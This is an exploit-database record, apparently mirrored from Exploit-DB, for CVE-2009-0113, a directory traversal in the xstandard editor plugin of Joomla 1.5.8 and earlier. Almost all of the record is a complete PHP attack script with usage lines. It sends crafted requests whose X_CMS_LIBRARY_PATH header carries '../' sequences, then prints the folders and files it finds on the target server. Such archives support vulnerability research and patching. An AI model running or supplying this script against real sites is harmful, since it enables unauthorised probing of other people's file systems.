{"id": "EDB-ID:7691", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Joomla! Component xstandard editor 1.5.8 - Local Directory Traversal", "description": "", "published": "2009-01-07T00:00:00", "modified": "2009-01-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/7691", "reporter": "irk4z", "references": [], "cvelist": ["2009-0113"], "immutableFields": [], "lastseen": "2022-01-13T07:03:17", "viewCount": 35, "enchantments": {"dependencies": {}, "score": {"value": 5.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2009-0113"]}]}, "exploitation": null, "vulnersScore": 5.1}, "sourceHref": "https://www.exploit-db.com/download/7691", "sourceData": "<?php\r\n/*\r\n Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability\r\n \r\n discovered by: irk4z[at]yahoo.pl\r\n greets: all friends ;) \r\n*/\r\n\r\necho \"* Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vuln\\n\";\r\necho \"* discovered by: irk4z[at]yahoo.pl\\n\";\r\necho \"*\\n\";\r\necho \"* greets: all friends ;) enjoy!\\n\";\r\necho \"*------------------------------------------------------------------*\\n\";\r\n\r\n$host = $argv[1];\r\n$path = $argv[2];\r\n$folder = $argv[3];\r\n\r\nif (empty($host) || empty($path)) {\r\n\techo \"usage: php {$argv[0]} <host> <path> [<folder>]\\n\";\r\n\techo \" php {$argv[0]} example.org /joomla\\n\";\r\n\techo \" php {$argv[0]} example.org /joomla ../../\\n\";\r\n\texit;\r\n}\r\n\r\necho \"http://\" . $host . $path . \"/images/stories/\\n\\n\";\r\n\r\nif ( empty($folder) ){\r\n\t$lev = \"./\";\r\n\tfor( $i = 0; $i <= 7; $i++ ) {\r\n\t\techo browseFolder($host, $path, $lev);\r\n\t\t$lev .= \"../\";\r\n\t}\r\n} else {\r\n\techo browseFolder($host, $path, $folder);\r\n}\r\n\r\nfunction browseFolder($host, $path, $folder){\r\n\t\r\n\t$packet = \"GET {$path}/plugins/editors/xstandard/attachmentlibrary.php HTTP/1.1\\r\\n\";\r\n\t$packet .= \"Host: {$host}\\r\\n\";\r\n\t$packet .= \"X_CMS_LIBRARY_PATH: {$folder}\\r\\n\";\r\n\t$packet .= \"Connection: Close\\r\\n\\r\\n\";\r\n\r\n\t$o = @fsockopen($host, 80);\r\n\tif(!$o){\r\n\t\techo \"\\n[x] No response...\\n\";\r\n\t\tdie;\r\n\t}\r\n\t\r\n\tfputs($o, $packet);\r\n\twhile (!feof($o)) $data .= fread($o, 1024);\r\n\tfclose($o);\r\n\t\r\n\t$_404 = strstr( $data, \"HTTP/1.1 404 Not Found\" );\r\n\tif ( !empty($_404) ){\r\n\t\techo \"\\n[x] 404 Not Found... Maybe wrong path? \\n\";\r\n\t\tdie;\r\n\t}\r\n\t\r\n\t//folders\r\n\tpreg_match_all(\"/<baseURL>([^<]+)<\\/baseURL>/\", $data, $matches);\r\n\t//files\r\n\tpreg_match_all(\"/<value>([^<]+\\.[^<]{3,4})<\\/value>/\", $data, $matches2);\r\n\t\r\n\t$matches = array_merge( $matches[1], $matches2[1] );\r\n\t\r\n\tif ( empty($matches) ){\r\n\t\t$ret = \"$folder [x] Failed...\\n\";\r\n\t} else {\r\n\t\t$ret = '';\r\n\t\tforeach( $matches as $tmp){\r\n\t\t\t$ret .= str_replace(\"images/stories/\", '', str_replace(\"/./\", \"/\", str_replace(\"//\", \"/\", urldecode($tmp) ) ) ) . \"\\n\";\r\n\t\t}\r\n\t}\r\n\t\r\n\treturn ($ret);\r\n}\r\n\r\n?>\r\n\r\n# milw0rm.com [2009-01-07]", "osvdbidlist": ["51172"], "exploitType": "webapps", "verified": true, "_state": {"dependencies": 1645247098}}
{}
Joomla! Component xstandard editor 1.5.8 - Local Directory Traversal